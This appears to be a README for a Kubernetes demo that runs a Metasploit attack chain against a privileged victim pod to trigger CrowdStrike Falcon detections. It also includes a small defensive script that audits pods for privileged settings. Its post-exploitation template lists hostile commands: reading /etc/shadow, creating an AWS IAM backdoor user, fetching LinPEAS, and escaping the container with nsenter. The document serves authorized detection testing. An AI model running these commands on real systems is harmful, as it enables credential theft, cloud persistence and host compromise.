A Kubernetes-based security demonstration environment designed for CrowdStrike Proof-of-Value (POV) testing with customers. This environment simulates sophisticated attack scenarios including container escape, cloud credential abuse, and malware execution to trigger comprehensive security detections.
This demo environment deploys containerized Metasploit Framework and victim containers to demonstrate:
- Bash reverse shell connections using TCP redirect for authentic attack signatures
- Container escape techniques using privileged containers
- AWS IAM credential abuse and backdoor creation
- Malware download and execution (LinPEAS, LSE, etc.)
- Data exfiltration simulation
- Complete attack chain automation with professional tooling
```
pov-shellshock-main/
├── demo-auto.sh       # Main orchestration script
├── demo-scripts.yaml  # ConfigMap with attack scripts and payloads
├── demo-server.yaml   # Containerized Metasploit Framework server
├── demo-client.yaml   # Victim container with embedded connection scripts
└── README.md          # This file
```
- Kubernetes cluster with kubectl access
- CrowdStrike Falcon sensor deployed (for detection validation)
- kubectl configured for your target cluster

1. Clone and navigate to the project:
   ```
   git clone https://github.com/kuhnskc/shellshock-container-demo.git
   cd shellshock-container-demo
   ```
2. Execute the demo:
   ```
   ./demo-auto.sh
   ```
3. Monitor the CrowdStrike Falcon console for detections during the ~4-minute demo run.
4. Clean up (optional):
   ```
   kubectl delete -f demo-client.yaml -f demo-server.yaml -f demo-scripts.yaml
   ```
- Deploys ConfigMap with attack scripts
- Creates demo-server (Metasploit) and demo-client (victim) pods
- Waits for pod readiness
- Installs Metasploit Framework in demo-server container
- Installs system dependencies and tools
- Prepares attack environment
- Establishes Metasploit listener with AutoRunScript
- Triggers bash reverse shell connection using TCP redirect for realistic attack signatures
- Executes comprehensive post-exploitation commands automatically
- Performs container escape and host-level operations
- Restarts victim pod to clean state
- Maintains attacker infrastructure for analysis
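The container escape step above only works because the victim pod runs with host-level capabilities (a privileged container, as the overview notes). As an added check that is not part of the demo repository, the following Python audits a `kubectl get pods -A -o json` dump for pods carrying those capabilities, so the POV operator can confirm before a run that only the demo pods have them and after cleanup that none remain; the pod list below is a constructed sample, not real cluster output.

```python
"""Audit a `kubectl get pods -A -o json` dump for escape-enabling settings.

Added example for the demo README, not code from the repository. Feed it
the real dump with: kubectl get pods -A -o json | python3 audit_pods.py
"""
import json
import sys

# Constructed sample shaped like `kubectl get pods -A -o json` (not real output).
SAMPLE_POD_LIST = json.dumps({
    "items": [
        {"metadata": {"name": "demo-client", "namespace": "default"},
         "spec": {"hostPID": True,
                  "containers": [{"name": "victim",
                                  "securityContext": {"privileged": True}}],
                  "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}},
        {"metadata": {"name": "demo-server", "namespace": "default"},
         "spec": {"containers": [{"name": "msf"}]}},
    ]
})


def risky_pods(pod_list_json: str) -> dict:
    """Return {namespace/name: [findings]} for pods that can reach the host.

    Findings cover host namespaces (hostPID/hostNetwork/hostIPC), privileged
    containers (including init containers) and hostPath volumes.
    """
    findings = {}
    for pod in json.loads(pod_list_json).get("items", []):
        meta, spec = pod["metadata"], pod.get("spec", {})
        key = f"{meta['namespace']}/{meta['name']}"
        hits = [flag for flag in ("hostPID", "hostNetwork", "hostIPC") if spec.get(flag)]
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            if c.get("securityContext", {}).get("privileged"):
                hits.append(f"privileged:{c['name']}")
        for v in spec.get("volumes", []):
            if "hostPath" in v:
                hits.append(f"hostPath:{v['hostPath'].get('path')}")
        if hits:
            findings[key] = hits
    return findings


if __name__ == "__main__":
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_POD_LIST
    for pod, hits in risky_pods(data).items():
        print(f"{pod}: {', '.join(hits)}")
```

An empty result after `kubectl delete` confirms the demo left no privileged or host-namespace pods behind.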
To modify the post-exploitation attack sequence, edit the post_exploit.template section in demo-scripts.yaml:
```yaml
data:
  post_exploit.template: |
    # Network reconnaissance
    nslookup google.com
    ping -c 5 8.8.8.8
    # System enumeration
    cat /etc/shadow
    cat /etc/passwd
    ps -A
    netstat -anlp
    # AWS cloud operations
    aws sts get-caller-identity
    aws iam create-user --user-name backdoor-user
    aws s3 ls
    # Malware simulation
    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    ./lse.sh -l 1 -i -c
    # Container escape
    nsenter --target 1 --mount --uts --ipc --net --pid -- whoami
```

After making changes, redeploy the ConfigMap:

```
kubectl apply -f demo-scripts.yaml
```

This tool is not officially supported by CrowdStrike and is provided as-is for educational and authorized security testing purposes only. Use at your own risk and only in environments where you have explicit permission to conduct security testing.
Co-authored with Claude AI assistance.